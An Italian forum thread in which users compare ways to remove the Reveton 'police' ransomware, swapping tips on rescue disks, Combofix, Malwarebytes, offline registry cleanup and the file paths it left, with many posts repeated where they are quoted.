buonasera,

premetto che ho già trovato in giro alcune soluzioni riguardanti questo virus
dovrei toglierlo da un pc non mio, che non vuole saperne di entrare in modalità provvisoria all'avvio (non so per quale strano motivo).. cosa mi consigliate di fare?!
questo pc ha già su avira e ccleaner..

segui la semplice procedura descritta in Guida alla Disinfezione per Infetti (http://www.hwupgrade.it/forum/showthread.php?t=1599737) e pubblica tutti i log richiesti facendo attenzione alle Regole di Sezione, così potremmo aiutarti :)

http://www.hwupgrade.it/forum/showthread.php?t=2456719

vedi Post 5 http://www.hwupgrade.it/forum/showpost.php?p=37152343&postcount=5

http://www.hwupgrade.it/forum/showthread.php?t=2456719

vedi Post 5 http://www.hwupgrade.it/forum/showpost.php?p=37152343&postcount=5

Grazie chillout
Se non ho capito male Kaspersky WindowsUnlocker devo farlo partire dal BIOS, come faccio?

Grazie chillout
Se non ho capito male Kaspersky WindowsUnlocker devo farlo partire dal BIOS, come faccio?

3. Configure the computer

a me è capitata una cosa simile.
solo che invece della schermata della polizia mi appare una schermata bianca.
mi potete aiutare??


Edit

i've scanned my PC whit AVG and I have found this trojan:
object name C:/windows/syswow64/svchost.exe (2236):/memory_00080000
detection name: trojan defiler G.

a me è capitata una cosa simile.
solo che invece della schermata della polizia mi appare una schermata bianca.
mi potete aiutare??


Edit

i've scanned my PC whit AVG and I have found this trojan:
object name C:/windows/syswow64/svchost.exe (2236):/memory_00080000
detection name: trojan defiler G.

Il PC funziona regolarmente a parte il redirect al sito indicato?

ho provato con kaspersky rescue cd ma ho avuto lo stesso problema descritto qui:

http://forum.kaspersky.com/index.php...&#entry1857297


sapete come mai non mi parte l'utility?

Nella maggior parte dei casi risolvo spesso con il CD di Kaspesky. Basta una scansione e tutto si sistema.

Il vero problema è come fare ad evitare il ripresentarsi del fastidioso evento dopo un certo periodo.

Infatti in alcuni casi mi succede che alcuni utenti riescono a farsi re-infettare con facilità. Alcuni dicono di digitare su google semplicemente la parola "hot" (ovviamente per cercare hotmail) per far sì di incappare nel problema.

Forse è il caso di impostare dei dns sicuri tipo opendns e/o google...???

Nella maggior parte dei casi risolvo spesso con il CD di Kaspesky. Basta una scansione e tutto si sistema.

Il vero problema è come fare ad evitare il ripresentarsi del fastidioso evento dopo un certo periodo.

Infatti in alcuni casi mi succede che alcuni utenti riescono a farsi re-infettare con facilità. Alcuni dicono di digitare su google semplicemente la parola "hot" (ovviamente per cercare hotmail) per far sì di incappare nel problema.


non ci credevo ma e' vero. basta fare una ricerca con google e copiare un link o solamente aprirlo che avg mi ha bloccato 3 virus. avevo i dns sicuri e non sono serviti a niente. anche google non aveva segnalato nessun pericolo. site advisor non lo avevo ancora installato. grazie.

Forse è il caso di impostare dei dns sicuri tipo opendns e/o google...???
segnalo anche i norton dns e i comodo dns.

Quindi deduco che per prevenire l'infezione bisogna avere:

- un buon antivirus (Avira Antivir...?)
- dns sicuri (open, google, norton o comodo)
- site advisor

Ok...???

e anche zonelarmfree.
io uso
1 antivirus avg
2 firewall zonealarm free
3 malwarebytes anti-malware scansioni manuali.
4 norton dns o comodo
5 siteadvisor
6 firefox con noscript e adblockplus.
con una ricerca su google ho preso 3 virus solo per aver aperto un sito, avg li ha fermati, ma visitando u' altra pagina ho preso un virus che aveva modificato notepad.exe.
si prova con un ripristino configurazione, ma io ho ripristinato l' immagine per sicurezza.

Quindi deduco che per prevenire l'infezione bisogna avere:

- un buon antivirus (Avira Antivir...?)
- dns sicuri (open, google, norton o comodo)
- site advisor

Ok...???

e anche zonelarmfree.
io uso
1 antivirus avg
2 firewall zonealarm free
3 malwarebytes anti-malware scansioni manuali.
4 norton dns o comodo
5 siteadvisor
6 firefox con noscript e adblockplus.
con una ricerca su google ho preso 3 virus solo per aver aperto un sito, avg li ha fermati, ma visitando u' altra pagina ho preso un virus che aveva modificato notepad.exe.
si prova con un ripristino configurazione, ma io ho ripristinato l' immagine per sicurezza.

3D dedicato

http://www.hwupgrade.it/forum/showthread.php?t=2011681

grazie, ciao.

io ho risolto creando un nuovo account ed eliminando quello precedente... sensa essere collegato in rete wXP

Come gentilmente segnalatoci dal mod spostiamoci in questa discussione:

3D dedicato

http://www.hwupgrade.it/forum/showthread.php?t=2011681

ciao, oggi mi sono beccato questo trojan e sto seguendo la guida per levarlo e va bene, ma mi chiedevo: come fa a infettare? io stavo navigando normalmente e non ho scaricato niente di niente prima del problema e ho avira che funzionava normalmente, da alcune parti ho letto che potrebbe essere un problema portato da falle di java (che in effetti ho installato da pochi giorni) qualcuno sa qualcosa di più preciso? Devo dire che in una dozzina di anni è il primo virus che riesco a prendermi =D

Questo malware mi è capitato in dievrsi pc di clienti, ho fatto caso che Avira (non solo il free ma anche il Professional) lo ignora totalmente, chi ha telefonato alla GDF e alla polizia postale si è sentito dire che Avira non lo trova e di preferire Kaspersky che lo riconosce bene....

a proposito di kasperksy, sto provando a fare lo scan del rescue disk ma mi rimane fermo su "loading definitions" senza smuoversi dallo 0% di progresso nello scan, se provo a farlo via text mode invece manda la prima linea di comando e poi non capita niente... devo fare qualcosa di diverso?

alla fine ce l'ho fatta, ed effettivamente mi ha trovato e cancellato due archivi java a suo dire infetti. Che il problema sia proprio java quindi?

Capitato pure a me su due PC, non li stavo utilizzando io quindi non so garantire i siti che stavano visitando, ma di sicuro al lavoro non apri un sito porno, ti si apre per motivi vari.

PC1: WXP aggiornato, Avira, Firefox 15 appena installato, Java 7.6
PC2: W7, Avira premium, Firefox 15 appena installato, Java 7.6 (su questo secondo pc si è pure preso i diritti di admin)

Deduco che il problema sia java, difatti dopo poche ORE han rilasciato l'aggiornamento a 7.7. (spero non sia FF15)

A me però non era un file java infetto, ma installava un link di nome ctfmon in esecuzione automatica che rimandava a roper0dun.exe nella cartella temp e nella cartella utente ho trovato un file .exe con l'icona di una cartella dal nome in esadecimale. Non ricordo il nome del virus.

Avviato in modalità provvisoria, cancellati i file e fatto una scansione con avira e poi sul PC1 con Spybot

Quello che mi chiedo è perchè non me li ha trovati in realtime?

PS CCleaner non ha cancellato TUTTI i file temp da tutte le cartelle temp!!!

anch'io ... beccato per ben 2 volte :(

l'utente admin è immune, o quanto meno utilizzo l'account standard che soffre di questi attachi virali in quanto lo coleggo alla rete

rimosso con MalwareBytes in modalità provvisoria!
i file erano 2: ctfmon e wsgdwsdg ... o simile
dal task manager era impossibile accedervi

dite che sia Java la falla !?
ad ogni modo ora aggiorno l'applet sia a 32 che 64 bit

p.s.
avevo avviato il Rescue Disc di Kaspersky, ma non partiva la modalità grafica; combofix non l'ho provato in quanto mai usato

anch'io ... beccato per ben 2 volte :(

l'utente admin è immune, o quanto meno utilizzo l'account standard che soffre di questi attachi virali in quanto lo coleggo alla rete

rimosso con MalwareBytes in modalità provvisoria!
i file erano 2: ctfmon e wsgdwsdg ... o simile
dal task manager era impossibile accedervi

dite che sia Java la falla !?
ad ogni modo ora aggiorno l'applet sia a 32 che 64 bit

p.s.
avevo avviato il Rescue Disc di Kaspersky, ma non partiva la modalità grafica; combofix non l'ho provato in quanto mai usato

Non saprei se sia proprio java, io ho avuto questa impressione ma niente di più.
Ero anche senza un firewall esterno comunque, poi ho provato a installare pc tool e mi ha incasinato il pc che ancora non funziona, ma questa è un'altra storia :D

Anche a me la modalità grafica di kaspersky ha dato problemi cmq, ho dovuto fare l'aggiornamento in modalità testo, e lo scan in modalità grafica. Ma cmq ha funzionato per bene.

Non saprei se sia proprio java, io ho avuto questa impressione ma niente di più.
Ero anche senza un firewall esterno comunque, poi ho provato a installare pc tool e mi ha incasinato il pc che ancora non funziona, ma questa è un'altra storia :D

Anche a me la modalità grafica di kaspersky ha dato problemi cmq, ho dovuto fare l'aggiornamento in modalità testo, e lo scan in modalità grafica. Ma cmq ha funzionato per bene.

Kaspersky non sono riuscito ad avviarlo, non so i comandi in modalità testo

Kaspersky non sono riuscito ad avviarlo, non so i comandi in modalità testo

ma in realtà anche in modalità testo non devi inserire tu i comandi ma c'è un menù da scorrere con le frecce della tastiera dove selezionare l'azione, quindi è comunque semplice.

Ad ogni modo dovessi avere altri problemi in futuro puoi usare anche il rescue disk di avira.

io ho eliminato quel virus usando malwarebytes anti malware in modalità provvisoria con rete , poi ho avuto accesso alla modalità normale di window 7 e da li avviato combofix :)

non mi riesce più trovare sul sito la giusta configurazione per avira, che con l'ultimo aggiornamento mi si sono resettate alcune opzioni -.-"

Io ho preso proprio in questi giorni la versione evoluta di questo virus,quello che disabilità task manager e modalità provvisoria...
Anche staccando internet all'avvio non da scampo,si apre comunque una pagina bianca che non lascia alcune azioni da fare.

Ho risolto senza formattare,staccando l'hard disk del mio netbook e infilandolo in un box esterno,ho scansionato poi l'hard disk collegato via usb in un secondo pc con il programma malwarebytes e mi ha trovato un file .exe e un file .dat infetti che ho rimosso.

Per quel che mi riguarda questi sono i percorsi di annidamento del virus :

D:\Users\pincopallino\AppData\Local\Temp\wgsdgsdgd sgsd.exe
D:\Users\pincopallino\AppData\Roaming\msconfig.dat

Una volta rimossi,ho rimontato l'hard disk sul netbook che si è avviato finalmente senza problemi e rimosso in seguito dall'esecuzione automatica di msconfig i collegamenti al virus....segue una pulizia rapida del registro e dei cookies con ccleaner e tutto è tornato alla normalità.

Avevi provato ad eseguire una scansione con Kapersky Rescue da CD?

ma in realtà anche in modalità testo non devi inserire tu i comandi ma c'è un menù da scorrere con le frecce della tastiera dove selezionare l'azione, quindi è comunque semplice.

Ad ogni modo dovessi avere altri problemi in futuro puoi usare anche il rescue disk di avira.

si, non sono riuscito neanche in modalità testo, mi erano estranei i comandi!
ho risolto con malware-bytes da provvisoria con rete

io ho eliminato quel virus usando malwarebytes anti malware in modalità provvisoria con rete , poi ho avuto accesso alla modalità normale di window 7 e da li avviato combofix :)
...

anch'io (come sopra), ma non ho utilizzato combo-fix, anche perchè non so usarlo e dovrei leggermi qualche guida; ad ogni modo ora è tutto ok, visto che è stato intaccato solo l'utente standard, suppongo!

Io ho preso proprio in questi giorni la versione evoluta di questo virus,quello che disabilità task manager e modalità provvisoria...
Anche staccando internet all'avvio non da scampo,si apre comunque una pagina bianca che non lascia alcune azioni da fare.

Ho risolto senza formattare,staccando l'hard disk del mio netbook e infilandolo in un box esterno,ho scansionato poi l'hard disk collegato via usb in un secondo pc con il programma malwarebytes e mi ha trovato un file .exe e un file .dat infetti che ho rimosso.

Per quel che mi riguarda questi sono i percorsi di annidamento del virus :

D:\Users\pincopallino\AppData\Local\Temp\wgsdgsdgd sgsd.exe
D:\Users\pincopallino\AppData\Roaming\msconfig.dat

Una volta rimossi,ho rimontato l'hard disk sul netbook che si è avviato finalmente senza problemi e rimosso in seguito dall'esecuzione automatica di msconfig i collegamenti al virus....segue una pulizia rapida del registro e dei cookies con ccleaner e tutto è tornato alla normalità.

si, esatto! proprio quei files
eviterei qualsiasi programma che intacchi il registro
uso ccleaner solo per pulire i files temporanei (ovvero "pulizia", no "registro")

a meno di sapere dove mettere le mani :O

Avevi provato ad eseguire una scansione con Kapersky Rescue da CD?

eh purtroppo ho scoperto solo in seguito questo metodo leggendo questo thread
Cmq non ho lettore Cd avendo in casa solo netbook,ma ho visto che si può creare anche una chiavetta bootable e farla partire dal bios con il kasp unlocker...

Prima di scansionare l'hard disk incriminato con malwarebytes con successo,l'ho scansionato con avast e avira (a pagamento) norton 2011 e spyboot,e nessuno di questi software ha rilevato il virus,oltre ed essere stato infettato con un nod32 installato ...

Mi chiedo se sia veramente utile tenere un antivirus installato che rallenta il pc e dimezza le prestazioni se poi cmq bisogna seguire guide apposite per rimuovere un eventuale virus...

Mi terrei un buon kasperski di base ma è un pò pesante per il mio netbook,credo che navigherò senza antivirus d'ora in poi tanto il rischio è lo stesso ma almeno non ho rallentamenti di alcun tipo.. :)

eviterei qualsiasi programma che intacchi il registro
uso ccleaner solo per pulire i files temporanei (ovvero "pulizia", no "registro")
a meno di sapere dove mettere le mani :O

Eh si quella di pulire il registro è un abitudine dura a morire,ricordo che con il vecchio regcleaner un paio di volte ho cancellato delle chiavi di registro che mi hanno compromesso xp ed ho dovuto reinstallarlo...
Ma il ccleaner mi sembra più intelligente,cancello sempre tutto quello che dice lui senza problemi :D per ora..

devo ripulire il pc di un amico da questo virus (diritti siae 100€...)

si risolve con combofix da modalità provvisoria???

devo ripulire il pc di un amico da questo virus (diritti siae 100€...)

si risolve con combofix da modalità provvisoria???

Pure io stesso problema sul portatile di un amico,ma a me sta faccendo sudare sette camice perilsemplice motivo che dal bootnon si avvia nessun cd masterizzato(ne rescue disk di kaspersky e nemmeno il cd live di ubuntu),di modalità provvissoria nemmeno si parla poi,ho tirato fuori il suo hard disk e lo collegato almio pc e scansione con kis 2013 ,ho le dita incrociate.

Pure io stesso problema sul portatile di un amico,ma a me sta faccendo sudare sette camice perilsemplice motivo che dal bootnon si avvia nessun cd masterizzato(ne rescue disk di kaspersky e nemmeno il cd live di ubuntu),di modalità provvissoria nemmeno si parla poi,ho tirato fuori il suo hard disk e lo collegato almio pc e scansione con kis 2013 ,ho le dita incrociate.

Strano. Sul BIOS è stato settato l'avvio da CD? Hai modo di provare con una lettore CD/DVD esterno?

devo ripulire il pc di un amico da questo virus (diritti siae 100€...)

si risolve con combofix da modalità provvisoria???

si risolve con kaspersky rescue disk o avira rescue, come scritto appena un paio di post sopra...

Pure io stesso problema sul portatile di un amico,ma a me sta faccendo sudare sette camice perilsemplice motivo che dal bootnon si avvia nessun cd masterizzato(ne rescue disk di kaspersky e nemmeno il cd live di ubuntu),di modalità provvissoria nemmeno si parla poi,ho tirato fuori il suo hard disk e lo collegato almio pc e scansione con kis 2013 ,ho le dita incrociate.

Strano. Sul BIOS è stato settato l'avvio da CD? Hai modo di provare con una lettore CD/DVD esterno?

E il cd sei sicuro sia masterizzato bene? Non ho idea del tuo grado di esperienza con il pc in generale, ma con amici alle prime armi mi è capitato che pensassero di masterizzare cd/dvd senza in realtà averli masterizzati sul serio :D (spedizione di 5-6 dvd di foto delle vacanze, tutti vuoti asd)

doppio

si risolve con kaspersky rescue disk o avira rescue, come scritto appena un paio di post sopra...


si ho letto,
ma è solo per un problema di tempo..... con combofix dovrebbe essere più breve mentre
le scansioni con queste suite sono molto piu' lunghe...

Mi è capitato un'altro caso ieri, più impestato del solitom, con avira rescue non ha risolto niente, anche staccando l'hard disk e pulendolo con G-Data 2013 non ha risolto (ha rimosso dei virus ma il pc continuava a non partire neanche in modalità provvisoria e con task manager disabilitato).
Ho risolto partendo con un cd di boot e facendo un ripristino a una settimana prima. Da quel che ho notato mi è sembrato che il virus abbia modificato i file NTuser.dat che si trovano dentro la cartella di ogni utente, almeno credo...

ho provato a ripulire un pc (mia nipote..) con vista64 infettato da questo virus...
In modalità provvisoria schermata tutta bianca pc completamente bloccato. Il task manager non si attivava...

Sono partito con un cd di riavvio basato su win7pe (una sorta di bartpe per w7), ho lanciato hijackthis (con runscanner per accedere alle entry del sistema infetto) e ho spuntato tutti i programmi allo startup , i servizi sospetti....

Riavvio OK in modalità provvisoria e scansione veloce con combofix (forse non era necessaria ma non
ho provato)..

Mamma mia che bastardo questo virus.Avevo beccato quello della guardia di finanza ma era piece of cake,bastava riavviare in modalità provvisoria.
Questo mi aveva bloccato tutto,ho dovuto formattare...

ci sono soluzioni per win xp?

Mamma mia che bastardo questo virus.Avevo beccato quello della guardia di finanza ma era piece of cake,bastava riavviare in modalità provvisoria.
Questo mi aveva bloccato tutto,ho dovuto formattare...

ci sono soluzioni per win xp?

http://www.hwupgrade.it/forum/showpost.php?p=37299105&postcount=3

....
ci sono soluzioni per win xp?

devi eliminare le entry che consentono l'avvio del virus allo startup (sia del sistema completo che in modalità provvisoria..). Per fare questo hai necessita di accedere al disco
da un sistema offiline (cd linux con editor del registro, bartpe cd, win7pe, hiren's boot cd, collegarlo ad un'altro sistema....)
Altrimenti ti devi affidare a queste suite (kaspersky, avira, bit defender..) con i relativi cd di rescue. A mio avviso queste soluzioni portano via una enorme quantità di tempo e purtroppo con risultato incerto

devi eliminare le entry che consentono l'avvio del virus allo startup (sia del sistema completo che in modalità provvisoria..). Per fare questo hai necessita di accedere al disco
da un sistema offiline (cd linux con editor del registro, bartpe cd, win7pe, hiren's boot cd, collegarlo ad un'altro sistema....)
Altrimenti ti devi affidare a queste suite (kaspersky, avira, bit defender..) con i relativi cd di rescue. A mio avviso queste soluzioni portano via una enorme quantità di tempo e purtroppo con risultato incerto

Infatti avevo provato con kaspersky ma mi si bloccava tutto.Nel primo caso come devo fare?
Scrivimelo pure anche in privato se puoi,grazie

... come devo fare?


devi generare/recuperare un cd di boot... (con torrent ne puoi ricercare qualcuno già bello e pronto... scarichi un .iso e masterizzi)...
avvia il pc da cd (vedi le impostazioni nel bios se necesario)
avvia il programma hijackthis o regedit per ispezionare il "registro
del sistema infetto" e spunta tutto quello che trovi allo start up (in hijackthis le voci con 04)
riavvia e entri in modalità provvisioria e lancia combofix

devi generare/recuperare un cd di boot... (con torrent ne puoi ricercare qualcuno già bello e pronto... scarichi un .iso e masterizzi)...
avvia il pc da cd (vedi le impostazioni nel bios se necesario)
avvia il programma hijackthis o regedit per ispezionare il "registro
del sistema infetto" e spunta tutto quello che trovi allo start up (in hijackthis le voci con 04)
riavvia e entri in modalità provvisioria e lancia combofix

Grazie mille

@Alfonso78: il boot ERA settato correttamente.



...
E il cd sei sicuro sia masterizzato bene? Non ho idea del tuo grado di esperienza con il pc in generale, ma con amici alle prime armi mi è capitato che pensassero di masterizzare cd/dvd senza in realtà averli masterizzati sul serio :D (spedizione di 5-6 dvd di foto delle vacanze, tutti vuoti asd)

Mi hai fatto venire un dubbio ma sono cd che ho sempre usato(cd live di ubuntu compreso),poi,il cd di rescue disk di kaspersky l'ho masterizzato direttamente dal mio pc usando kis,quindi escludo questo ipotesi e devo aggiungere un particolare che spero leggano tutti:
Il virus nel mio caso ha distrutto accesso alla modalità provvissoria,di conseguenza se dal msconfig scegliamo l'avvio in safe mode addio a tutto per chè il sistema vuole sempre partire in questa modalità che di fatto resta impossibile,ho dovuto tirare fuori hd fisicamente dal portatile ,collegarlo al mio desk e formattarlo completamente.

Mi hai fatto venire un dubbio ma sono cd che ho sempre usato(cd live di ubuntu compreso),poi,il cd di rescue disk di kaspersky l'ho masterizzato direttamente dal mio pc usando kis,quindi escludo questo ipotesi e devo aggiungere un particolare che spero leggano tutti:
Il virus nel mio caso ha distrutto accesso alla modalità provvissoria,di conseguenza se dal msconfig scegliamo l'avvio in safe mode addio a tutto per chè il sistema vuole sempre partire in questa modalità che di fatto resta impossibile,ho dovuto tirare fuori hd fisicamente dal portatile ,collegarlo al mio desk e formattarlo completamente.

No beh se si hai già usati il problema non è del dvd allora, molto strano...

Ad ogni modo FORSE prima del format si sarebbe ancora potuto provare a fare un ripristino di windows con il cd d'installazione, ma questo andava fatto dopo aver ripulito con il live di kaspersky che però a te non funziona... che sfiga :stordita:

No beh se si hai già usati il problema non è del dvd allora, molto strano...

Ad ogni modo FORSE prima del format si sarebbe ancora potuto provare a fare un ripristino di windows con il cd d'installazione, ma questo andava fatto dopo aver ripulito con il live di kaspersky che però a te non funziona... che sfiga :stordita:

Esatto,solo che l'ho letto solo dopo che avrebbe bruciato la safe mode,quando ormai era tardi,e te ne dico un altra? col hard disk infetto sullo stessocomputer non riuscivo nemmeno a formattare con una nuova installazione,in pratica falliva la formattazione,ecco perchè l'ho dovuto collegare ad un altro computer.:doh:

Io ancora non ho capito dove l'ho preso questo virus.
Pensavo di averlo preso da un sito mentre cercavo un torrent,per curiosità ci sono ritornato(intanto ho preparato milioni di cd di boot) ma non è successo nulla.
Quando ero stato infettato però Firefox mi diceva che alcuni plugin non erano aggionati(tipo java),può dipendere da quello?

Esatto,solo che l'ho letto solo dopo che avrebbe bruciato la safe mode,quando ormai era tardi,e te ne dico un altra? col hard disk infetto sullo stessocomputer non riuscivo nemmeno a formattare con una nuova installazione,in pratica falliva la formattazione,ecco perchè l'ho dovuto collegare ad un altro computer.:doh:

Mah! A prescindere dallo stato dell'installazione di win e di qualunque virus il format fatto con il cd di installazione dovrebbe fregarsene... a sto punto sicuro che il cavo con cui l'hd era collegato funzionasse a dovere? una volta ricollegato non ti ha più dato noie di nessun tipo?

Mah! A prescindere dallo stato dell'installazione di win e di qualunque virus il format fatto con il cd di installazione dovrebbe fregarsene... a sto punto sicuro che il cavo con cui l'hd era collegato funzionasse a dovere? una volta ricollegato non ti ha più dato noie di nessun tipo?

Il cavo è da escludere a priori,in quel caso la scheda madre non l'avrebbe nemmeno visto,vai a vedere cosa va a modificare sto virus per evitare la formattazione,ti dirò di pù,prima di smontare hd ogni volta che tentavo di formattarlo col cd di windows vedeva tutte le partitizioni ma falliva la formattazione.

Io ancora non ho capito dove l'ho preso questo virus. Quando ero stato infettato però Firefox mi diceva che alcuni plugin non erano aggionati(tipo java),può dipendere da quello?
Lo si trova spesso nei siti facendo delle ricerche su google.com e .it

Per debellarlo semplicemente (ora) basta usare il taskmanager e terminare diversi servizi attivi (tra cui explorer), poi basta da riga di comando andare dentro alla cartella dove c'è il file ed eliminarlo (e anche la copia nei file %temp%) e da esecuzione automatica rimuovere il link creatosi. Al reboot sei a posto come se niente fosse.

In qualche caso basta far girare "Anti-Malware Toolkit" e al reboot sei a posto.

Lo si trova spesso nei siti facendo delle ricerche su google.com e .it

Per debellarlo semplicemente (ora) basta usare il taskmanager e terminare diversi servizi attivi (tra cui explorer), poi basta da riga di comando andare dentro alla cartella dove c'è il file ed eliminarlo (e anche la copia nei file %temp%) e da esecuzione automatica rimuovere il link creatosi. Al reboot sei a posto come se niente fosse.

In qualche caso basta far girare "Anti-Malware Toolkit" e al reboot sei a posto.

Eh ma come fai ad accedere al task manager se la schermata fake ti blocca tutto

ciao, una volta selezionato dal Boot Menu , la chiavetta Usb mi compare questa scritta [ Minimal BASH-like line editing is supported. for the first word , TAB lists possible command completions. Anywhere else TAB lists the possiblie completions of a device7filename. ]
grub >

Cosa devo fare ? Grazie !

ciao, una volta selezionato dal Boot Menu , la chiavetta Usb mi compare questa scritta [ Minimal BASH-like line editing is supported. for the first word , TAB lists possible command completions. Anywhere else TAB lists the possiblie completions of a device7filename. ]
grub >

Cosa devo fare ? Grazie !

Macchina in Dual Boot?

Credo di si , prima avevo windows vista adesso ho windows 7 ..

Qualche consiglio ??

Qualche consiglio ??

Devi reinstallare Grub

Premetto che la mia era una situazione particolare e in 5 min ho risolto.

Premessa: Ho un portatile con Windows 7 Home Premium, ha due account, uno Admin (utilizzato da me) e uno Guest (utlizzato da mio padre, senza funzioni di controllo admin). Ieri mio padre si è beccato il fantomatico malware della Polizia di Stato, sul suo account guest.

Risoluzione: L'account guest veniva sistematicamente bloccato dal malware. Ho riavviato, ho utilizzato il MIO account Admin (sul quale tra l'altro andava tutto tranquillamente come se nulla fosse, internet compreso) ed ho lanciato lo scan di Microsoft Security Essentials (con poche pretese visto che non gli ho mai visto trovare nulla, tentar non nuoce). Lo scan con mia sorpresa ha rilevato il malware/trojan che nel mio caso specifico era denominato "Reveton.F!Ink" e un altro file di cui non ricordo il nome. Cliccato elimina, risolto il problema!

Ho postato in caso tornasse di aiuto a qualcuno. :)

Saluti

ecco perche' consigliano di navigare con un account user o forse e' meglio ancora Guest?

Io grazie a questo sito ho risolto. Sembrano abbastanza esperti del problema..

Link1 (http://www.chiccheinformatiche.com/virus-guardia-di-finanza-virus-polizia-postale-virus-siae-tutte-le-soluzioni-al-momento-conosciute/)

Link2 (http://www.chiccheinformatiche.com/virus-guardia-di-finanza-si-e-evoluto-ecco-la-nuova-guida-per-risolvere-il-problema/)

Mah ragazzi......... io mi sono letto tutto il thread e devo dire che sono, come al solito :), in disaccordo con molti voi:
Onestamente di queste cose girano parecchie varianti....... dalla polizia di stato.. alla finanza... alla SIAE ecc. ecc. e tutto è stato SEMPRE deballato col semplice lancio dell'ultima release del COMBOFIX!

Di solito prima del COMBOFIX lancio anche l'rkill che è un programmino che fa una mini scansione dei processi attivi e blocca eventuali processi sconosciuti e che ritiene siano infezioni.

Quello che poi faccio di solito è anche disinstallare l'antivirus presente....e quindi reinstallarne uno........ ma vi dico che non c'è un'antivirus certo che blocca questa M****A perchè ho visto gente beccarlo con Avira.. con Avast con AVG con o senza il Windows Defender Attivo (ovviamente su windows 7) e anche con l'antivirus di casa microsoft quindi a voi la scelta.

Io personalmente c'ho 4 pc a casa e sta porcheria non l'ho mai beccata... ma come non l'ho beccato io memmeno i miei che navigano in rete praticamente cliccando su qualsiasi banner che citi la parola "gratis" quindi RIPETO a mio avviso non c'è una causa ben chiara su come questi virus possano infettare i Vostri PC.
Quello che purtroppo mi trovo a confermare è che ho avuto clienti/amici che anche dopo esser stati ripuliti si ripresentavano dopo nemmeno 2 giorni con lo stesso identico problema.......... quindi deduco che il problema principale non è l'antivirus o i dns (come ho letto qua) o qualsiasi altra cosa ma il problema è sempre chi si trova davanti al monitor stesso.

Io sul mio notebook ho Windows 7 SP1 sempre aggiornato con gli ultimi aggiornamenti sulla sicurezza rilasciati mensilmente da Microsoft. Come browser ho Internet Explorer 9. Stamattina ho fatto una scansione del sistema con Avira Antivirus Premium 2012 e mi ha trovato in "C:\Utenti\NomeUtente" un file chiamato "wgsdgsdgdsgsd.exe" e mi ha detto che tale file fosse infetto con il cavallo di troia "TR/Reveton.F.44". L'azione consigliata è stata quella di spostare il file in quarantena, cosa che ho fatto (cioè che ha fatto Avira dopo avergli dato l'OK).

Devo fare altro? Adesso sono terrorizzato che questo virus possa aver già fatto danni, come aver modificato il registro di Windows o altro! :(
Però trovo doveroso precisare che io non ho nessun problema di quelli da voi citati. A me il task manager funziona, non ho blocchi di nessun tipo e non mi appare nessuna schermata. Zero problemi! Non ne ho adesso problemi e non ne avevo nemmeno prima che Avira mi trovasse sto file (wgsdgsdgdsgsd.exe) e me lo mettesse in quarantena. Ho fatto la scansione con Avira solo perchè la eseguo una volta al mese per vedere se c'è qualche virus (e ne trovo rarissimamente). Ho postato il mio quesito in questo thread perchè ho fatto una ricerca sù Google e diversi fonti danno il file "wgsdgsdgdsgsd.exe" collegato col "virus della polizia" e simili.

Che mi dite?

Io sul mio notebook ho Windows 7 SP1 sempre aggiornato con gli ultimi aggiornamenti sulla sicurezza rilasciati mensilmente da Microsoft. Come browser ho Internet Explorer 9. Stamattina ho fatto una scansione del sistema con Avira Antivirus Premium 2012 e mi ha trovato in "C:\Utenti\NomeUtente" un file chiamato "wgsdgsdgdsgsd.exe" e mi ha detto che tale file fosse infetto con il cavallo di troia "TR/Reveton.F.44". L'azione consigliata è stata quella di spostare il file in quarantena, cosa che ho fatto (cioè che ha fatto Avira dopo avergli dato l'OK).

Devo fare altro? Adesso sono terrorizzato che questo virus possa aver già fatto danni, come aver modificato il registro di Windows o altro! :(
Però trovo doveroso precisare che io non ho nessun problema di quelli da voi citati. A me il task manager funziona, non ho blocchi di nessun tipo e non mi appare nessuna schermata. Zero problemi! Non ne ho adesso problemi e non ne avevo nemmeno prima che Avira mi trovasse sto file (wgsdgsdgdsgsd.exe) e me lo mettesse in quarantena. Ho fatto la scansione con Avira solo perchè la eseguo una volta al mese per vedere se c'è qualche virus (e ne trovo rarissimamente). Ho postato il mio quesito in questo thread perchè ho fatto una ricerca sù Google e diversi fonti danno il file "wgsdgsdgdsgsd.exe" collegato col "virus della polizia" e simili.

Che mi dite?

Fai un controllo con HitmanPro 3.7 http://www.surfright.nl/it/downloads/

NB: non prevede installazione
NB1: non attivare la licenza

Prima di fare il controllo con Hitman vorrei sapere una cosa...se Hitman mi trova qualche file infetto lo rimuove senza prima chiedere a me di confermare l'eliminazione? Non vorrei mi cancellasse qualche file che invece è pulito e che mi serve!

Prima di fare il controllo con Hitman vorrei sapere una cosa...se Hitman mi trova qualche file infetto lo rimuove senza prima chiedere a me di confermare l'eliminazione? Non vorrei mi cancellasse qualche file che invece è pulito e che mi serve!

Chiede conferma

io ho risolto grazie a questa guida

http://www.chiccheinformatiche.com/virus-guardia-di-finanza-virus-polizia-postale-virus-siae-tutte-le-soluzioni-al-momento-conosciute

l'ho beccato anche io...il pc ha win 7 montato e funziona solo in modalità provvisoria con comandi prompt. Ora cosa faccio? Ho provato a mettere su una chiavetta Combofix ma non riesco ad eseguirlo
con i comandi prompt...non so davvero come risolvere...

grazie

l'ho beccato anche io...il pc ha win 7 montato e funziona solo in modalità provvisoria con comandi prompt. Ora cosa faccio? Ho provato a mettere su una chiavetta Combofix ma non riesco ad eseguirlo
con i comandi prompt...non so davvero come risolvere...

grazie

sono riuscito a lanciare combofix e ora sembra funzionare nuovamente tutto. Ma devo fare altro? Devo cancellare manualmente qualcosa che è indicata nel log di combofix?

grazie

sono riuscito a lanciare combofix e ora sembra funzionare nuovamente tutto. Ma devo fare altro? Devo cancellare manualmente qualcosa che è indicata nel log di combofix?

grazie

Ciao, allega il log di Combofix nel rispetto delle seguenti regole http://www.hwupgrade.it/forum/showthread.php?t=1751598

Ciao, allega il log di Combofix nel rispetto delle seguenti regole http://www.hwupgrade.it/forum/showthread.php?t=1751598

Pazzesco.....è andato bene per un 1 giorno...accendo il pc ora e ricompare blocco polizia... Ho appena lanciato combofix, vi allego subito il log.

Intanto anticipo che durante la scansione di combo è comparso una finestra in cui si diceva che era stati individuato EICAR test file ma che non poteva essere cancellato....

Inoltre ora che combo ha finito di girare mi è rimasta accesa la spia della cam del pc che si attivava con il virus....

vi allego tutto.

grazie e Buon Natale :D

Pazzesco.....è andato bene per un 1 giorno...accendo il pc ora e ricompare blocco polizia... Ho appena lanciato combofix, vi allego subito il log.

Intanto anticipo che durante la scansione di combo è comparso una finestra in cui si diceva che era stati individuato EICAR test file ma che non poteva essere cancellato....

Inoltre ora che combo ha finito di girare mi è rimasta accesa la spia della cam del pc che si attivava con il virus....

vi allego tutto.

